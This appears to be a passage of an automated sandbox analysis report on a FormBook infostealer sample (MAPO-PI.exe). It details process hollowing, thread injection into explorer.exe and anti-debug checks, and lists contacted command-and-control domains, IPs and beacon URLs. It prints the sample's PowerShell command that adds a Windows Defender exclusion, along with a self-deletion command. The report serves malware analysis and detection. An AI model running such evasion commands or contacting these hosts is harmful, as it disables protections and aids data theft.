Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21608 mov eax, dword ptr fs:[00000030h] 16_2_04D21608
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6E620 mov eax, dword ptr fs:[00000030h] 16_2_04C6E620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D1FE3F mov eax, dword ptr fs:[00000030h] 16_2_04D1FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA37F5 mov eax, dword ptr fs:[00000030h] 16_2_04CA37F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C78794 mov eax, dword ptr fs:[00000030h] 16_2_04C78794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h] 16_2_04CE7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h] 16_2_04CE7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h] 16_2_04CE7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7EF40 mov eax, dword ptr fs:[00000030h] 16_2_04C7EF40
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\MAPO-PI.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0040ACC0 LdrLoadDll, 3_2_0040ACC0
Source: C:\Users\user\Desktop\MAPO-PI.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 159.65.10.143 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.lifeinformpodcast.com
Source: C:\Windows\explorer.exe Domain query: www.transforming-leadership.com
Source: C:\Windows\explorer.exe Domain query: www.diofis.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 109.232.217.55 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\MAPO-PI.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 8B0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\MAPO-PI.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\MAPO-PI.exe Thread register set: target process: 3472 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3472 Jump to behavior
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe' Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe' Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe' Jump to behavior
Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000004.00000000.240240784.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Users\user\Desktop\MAPO-PI.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 510736 Sample: MAPO-PI.exe Startdate: 28/10/2021 Architecture: WINDOWS Score: 100 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 8 other signatures 2->46 10 MAPO-PI.exe 4 2->10         started        process3 file4 32 C:\Users\user\AppData\...\MAPO-PI.exe.log, ASCII 10->32 dropped 58 Adds a directory exclusion to Windows Defender 10->58 60 Tries to detect virtualization through RDTSC time measurements 10->60 14 MAPO-PI.exe 10->14         started        17 powershell.exe 25 10->17         started        signatures5 process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 19 explorer.exe 14->19 injected 23 conhost.exe 17->23         started        process8 dnsIp9 34 www.transforming-leadership.com 159.65.10.143, 49790, 80 DIGITALOCEAN-ASNUS United States 19->34 36 diofis.com 109.232.217.55, 49795, 80 AEROTEK-ASTR Turkey 19->36 38 3 other IPs or domains 19->38 48 System process connects to network (likely due to code injection or exploit) 19->48 25 cmmon32.exe 19->25         started        signatures10 process11 signatures12 50 Self deletion via cmd delete 25->50 52 Modifies the context of a thread in another process (thread injection) 25->52 54 Maps a DLL or memory area into another process 25->54 56 Tries to detect virtualization through RDTSC time measurements 25->56 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.102.136.180
 lifeinformpodcast.com United States
15169 GOOGLEUS false
159.65.10.143
 www.transforming-leadership.com United States
14061 DIGITALOCEAN-ASNUS true
109.232.217.55
 diofis.com Turkey
42807 AEROTEK-ASTR true

Contacted Domains

Name IP Active
www.transforming-leadership.com 159.65.10.143 true
lifeinformpodcast.com 34.102.136.180 true
diofis.com 109.232.217.55 true
www.diofis.com unknown unknown
www.lifeinformpodcast.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.diofis.com/rigx/ true
  • Avira URL Cloud: safe
 low
http://www.lifeinformpodcast.com/rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm false
  • Avira URL Cloud: safe
 unknown
http://www.transforming-leadership.com/rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 true
  • Avira URL Cloud: safe
 unknown
http://www.diofis.com/rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV true
  • Avira URL Cloud: safe
 unknown